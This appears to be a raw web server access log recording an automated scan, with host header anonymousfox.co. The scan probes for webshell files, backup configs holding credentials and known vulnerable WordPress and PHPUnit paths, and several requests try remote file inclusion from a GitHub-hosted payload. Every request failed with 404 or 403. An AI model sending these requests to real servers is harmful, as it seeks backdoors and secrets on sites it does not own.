-	07:52:20	-0600	GET /style.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:21	-0600	GET /moduless.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:22	-0600	GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:23	-0600	GET /admin.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:25	-0600	GET /index.php?3x=3x HTTP/1.1	403	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:25	-0600	GET /boom.php?x HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:26	-0600	GET /wp-content/plugins/backup_index.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:27	-0600	GET /wp-content/db_cache.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:28	-0600	GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1	404	7176	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:31	-0600	GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:31	-0600	GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:32	-0600	GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:33	-0600	GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:35	-0600	GET /alfindex.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:35	-0600	GET /alfa.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:36	-0600	GET /wp-booking.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:37	-0600	GET /cindex.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:38	-0600	GET /wp-content/wp-1ogin_bak.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:39	-0600	GET /wp-1ogin_bak.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:40	-0600	GET /wp-includes/fonts/css.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:41	-0600	GET /wp-includes/css/css.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:43	-0600	GET /old-index.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:44	-0600	GET /config.bak.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:45	-0600	GET /wp-admin/config.bak.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:46	-0600	GET /wp-content/config.bak.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:47	-0600	GET /wp-includes/config.bak.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:48	-0600	GET /wp-content/themes/config.bak.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:49	-0600	GET /wp-content/plugins/config.bak.php HTTP/1.1	404	7176	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:49	-0600	POST /wp-includes/css/wp-config.php HTTP/1.1	404	7176	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:53	-0600	GET /wp-content/plugins/ubh/up.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:54	-0600	GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:55	-0600	GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1	404	7176	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:55	-0600	GET /haders.php HTTP/1.1	404	7176	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:56	-0600	GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:58	-0600	GET /legion.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:52:59	-0600	GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:53:00	-0600	GET /wp-includes/lfx.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:53:01	-0600	GET /wp-includes/small.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:53:02	-0600	GET /up.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:53:03	-0600	GET /upload.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:53:04	-0600	GET /config.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:53:05	-0600	GET /test.php?Ghost=send HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:53:06	-0600	GET /wp-content/langar.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:53:07	-0600	GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:53:08	-0600	GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	07:53:09	-0600	GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1	403	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
